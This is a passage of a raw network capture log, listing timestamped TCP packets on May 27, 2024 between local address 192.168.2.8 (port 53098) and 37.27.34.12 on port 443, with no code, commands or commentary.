                                                            May 27, 2024 15:24:21.903760910 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.903811932 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:21.946229935 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.946281910 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.946405888 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:21.946445942 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.946466923 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:21.946500063 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:21.971976042 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.972047091 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.972237110 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:21.972300053 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.972363949 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:21.994724035 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.994751930 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.994848967 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:21.994853973 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:21.994898081 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.018194914 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.018215895 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.018336058 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.018341064 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.018404961 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.032035112 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.032063007 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.032146931 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.032151937 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.032201052 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.051793098 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.051820040 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.051934004 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.051939011 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.051990032 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.067837000 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.067862988 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.067955971 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.067961931 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.068007946 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.085253000 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.085287094 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.085360050 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.085365057 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.085427999 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.098589897 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.098618031 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.098664999 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.098669052 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.098721027 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.108803034 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.108829021 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.108877897 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.108881950 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.108908892 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.108938932 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.119882107 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.119911909 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.119982958 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.119987965 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.120048046 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.128921032 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.128948927 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.129033089 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.129035950 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.129085064 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.139234066 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.139269114 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.139333010 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.139337063 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.139388084 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.148117065 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.148154020 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.148214102 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.148216963 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.148250103 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.148273945 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.155385971 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.155421019 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.155477047 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.155482054 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.155535936 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.170850039 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.170870066 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.170974016 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.170979023 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.171031952 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.195836067 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.195853949 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.195972919 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.195993900 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.196041107 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.197805882 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.197828054 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.197890997 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.197896004 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.197941065 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.206880093 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.206929922 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.206981897 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.206985950 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.207015038 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.207036972 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.216547966 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.216567993 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.216626883 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.216630936 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.216682911 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.226116896 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.226138115 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.226214886 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.226218939 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.226265907 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.235096931 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.235126972 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.235196114 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.235198975 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.235248089 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.235271931 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.257832050 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.257868052 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.257947922 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.257952929 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.258002996 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.258260965 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.258281946 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.258318901 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.258322954 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.258377075 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.281799078 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.281821966 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.281903982 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.281912088 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.281955957 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.283783913 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.283809900 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.283854961 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.283859015 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.283884048 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.283906937 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.293816090 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.293847084 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.293927908 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.293931961 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.293986082 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.307267904 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.307301998 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.307380915 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.307384968 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.307436943 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.313025951 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.313046932 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.313097954 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.313101053 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.313133001 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.313157082 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.321218967 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.321243048 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.321310043 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.321314096 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.321366072 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.333461046 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.333493948 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.333615065 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.333638906 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.333818913 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.341990948 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.342015028 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.342154980 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.342164040 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.342212915 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.370723963 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.370750904 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.370795012 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.370800972 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.370848894 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.371213913 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.371241093 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.371270895 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.371274948 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.371316910 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.385005951 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.385049105 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.385066986 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.385071993 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.385109901 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.396105051 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.396131992 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.396169901 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.396173954 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.396217108 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.400302887 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.400333881 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.400402069 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.400408983 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.400460958 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.411108971 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.411133051 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.411176920 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.411180973 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.411236048 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.421607018 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.421644926 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.421685934 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.421689987 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.421740055 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.435024977 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.435070992 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.435094118 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.435098886 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.435146093 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.460014105 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.460035086 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.460081100 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.460084915 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.460135937 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.460194111 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.460212946 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.460242987 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.460246086 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.460268974 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.460290909 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.471662045 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.471682072 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.471765995 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.471771002 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.471816063 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.478271961 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.478298903 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.478391886 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.478395939 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.478432894 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.487199068 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.487225056 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.487293959 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.487302065 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.487339973 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.500451088 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.500479937 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.500585079 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.500598907 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.500633955 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.508614063 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.508636951 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.508691072 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.508701086 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.508734941 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.508749962 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.522224903 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.522247076 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.522311926 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.522320032 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.522356987 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.544307947 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.544339895 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.544395924 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.544400930 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.544434071 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.545468092 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.545496941 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.545528889 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.545533895 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.545552969 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.545571089 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.558814049 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.558846951 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.558932066 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.558937073 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.558981895 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.565752029 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.565778017 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.565838099 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.565841913 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.565884113 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.574301958 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.574327946 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.574381113 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.574385881 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.574414015 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.574430943 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.587124109 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.587147951 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.587229967 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.587234020 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.587265968 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.595608950 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.595635891 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.595748901 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.595753908 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.595834017 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.609524012 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.609549999 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.609647036 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.609669924 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.609714985 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.631177902 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.631222963 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.631278992 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.631283998 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.631316900 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.631340981 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.632458925 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.632482052 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.632535934 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.632540941 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.632595062 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.646086931 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.646116972 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.646316051 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.646322012 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.646374941 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.652772903 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.652791977 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.652890921 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.652895927 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.652945042 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.661372900 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.661405087 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.661478996 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.661484003 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.661529064 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.675406933 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.675432920 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.675647974 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.675652981 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.675708055 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.690546989 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.690597057 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.690677881 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.690682888 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.690725088 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.707813025 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.707843065 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.708002090 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.708024025 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.708070040 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.718817949 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.718843937 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.718996048 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.719002008 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.719053984 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.719693899 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.719726086 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.719902992 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.719907045 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.719953060 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.733201027 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.733236074 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.733366013 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.733370066 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.733422995 CEST53098443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:22.739695072 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.739718914 CEST4435309837.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:22.739940882 CEST53098443192.168.2.837.27.34.12
